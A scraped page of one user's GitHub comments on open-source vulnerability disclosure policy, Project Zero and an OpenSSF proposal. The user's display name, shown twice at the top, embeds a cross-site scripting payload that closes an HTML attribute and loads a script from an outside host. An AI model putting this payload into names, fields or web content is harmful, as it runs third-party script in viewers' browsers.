Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Results 594 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

> How does Project Zero’s policy apply to open-source projects? The verbiage in the policy and FAQ seems specifically targeted at vendors and “patches”. As far as I can tell,...

I agree, but that should be broken out into an independent issue dedicated to that topic specifically. While those two problems look to be the same, they really aren't, unfortunately.

What do you mean by ambiguous? What wording do you think has this characteristic? AFAIK, they don't have a specific policy that's different for OSS. From what I've heard, they...

Please see the proposed policy and leave any review comments: https://docs.google.com/document/d/1W2Xfw9i5pSA-0XbIw3a4kcW2o4PByxDbjcnWe9mlQwA/edit?usp=sharing

Submitted to the TAC: https://github.com/ossf/tac/issues/149

Submitted to the LF Legal team for review: (internal/private link): https://legaljira.linuxfoundation.org/servicedesk/customer/portal/1/LR-1447

> We have temporarily removed the Safe Harbor section because the Linux Foundation Counsel advised that the text as written has serious problems. We need to find a solution to...

Hey @PaulFridrick this would technically be an API breaking change. If we're going to make this change, it will need to be documented in the release notes.

Unfortunately, there are very few plans with this plugin currently. We do plan to continue to maintain it. We use it internally; however, it's not a priority. > Even master...